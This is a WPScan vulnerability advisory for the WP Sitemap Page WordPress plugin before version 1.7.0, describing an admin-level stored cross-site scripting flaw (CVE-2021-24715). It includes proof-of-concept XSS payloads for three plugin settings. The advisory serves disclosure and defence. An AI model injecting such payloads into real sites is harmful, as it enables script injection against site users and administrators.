WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP Sitemap Page < 1.7.0 - Admin+ Stored Cross Site Scripting

Description

The plugin does not properly sanitise and escape some of its settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

Proof of Concept

Put the following payloads in the mentioned settings of the plugin:
- How to display the posts (backend XSS, v < 1.6.5): </textarea><svg/onload=confirm('XSS')>
- How to display the posts (frontend XSS, v < 1.6.6): <a style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(/XSS/)" href="{permalink}">{title}</a>
- Exclude pages (backend XSS, v < 1.7.0): "><script>alert(/XSS/)</script>

Affects Plugins

wp-sitemap-page
Fixed in version 1.7.0

References

CVE
CVE-2021-24715
ExploitDB
50268

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Nikhil Kapoor From Esecforte

Submitter

Nikhil Kapoor From Esecforte

Verified

Yes

WPVDB ID
da66d54e-dda8-4aa8-8d27-b8b87100bb21

Timeline

Publicly Published

2021-09-07 (about 1 years ago)

Added

2021-10-05 (about 1 years ago)

Last Updated

2022-04-12 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin